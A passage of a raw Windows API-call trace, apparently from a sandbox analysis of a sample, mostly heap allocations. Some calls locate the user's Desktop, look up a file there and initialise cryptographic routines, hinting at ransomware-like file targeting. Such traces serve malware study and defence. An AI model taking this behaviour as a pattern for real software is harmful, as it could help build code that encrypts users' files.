(HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0145.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0145.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0145.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0145.369] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0145.369] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0145.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0145.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0145.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0145.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0145.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0145.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0145.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0145.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0145.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0145.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0145.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0145.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e538c0 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0145.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0145.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0145.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0145.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0145.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0145.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0145.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0145.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0145.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0145.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0145.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0145.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0145.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0145.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0145.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0145.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0145.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0145.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0145.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0145.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.384] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Dh6CM5.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69416410, ftCreationTime.dwHighDateTime=0x1d5e646, ftLastAccessTime.dwLowDateTime=0x2034f840, ftLastAccessTime.dwHighDateTime=0x1d5ef42, ftLastWriteTime.dwLowDateTime=0x2034f840, ftLastWriteTime.dwHighDateTime=0x1d5ef42, nFileSizeHigh=0x0, nFileSizeLow=0x13c4e, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Dh6CM5.flv", cAlternateFileName="")) returned 0xa87590 [0145.384] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0145.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0145.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0145.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0145.385] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0145.385] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0145.385] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.385] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0145.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0145.386] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0145.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.387] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0145.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b78 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0145.387] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0145.388] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0145.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0145.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0145.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0145.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0145.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0145.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, 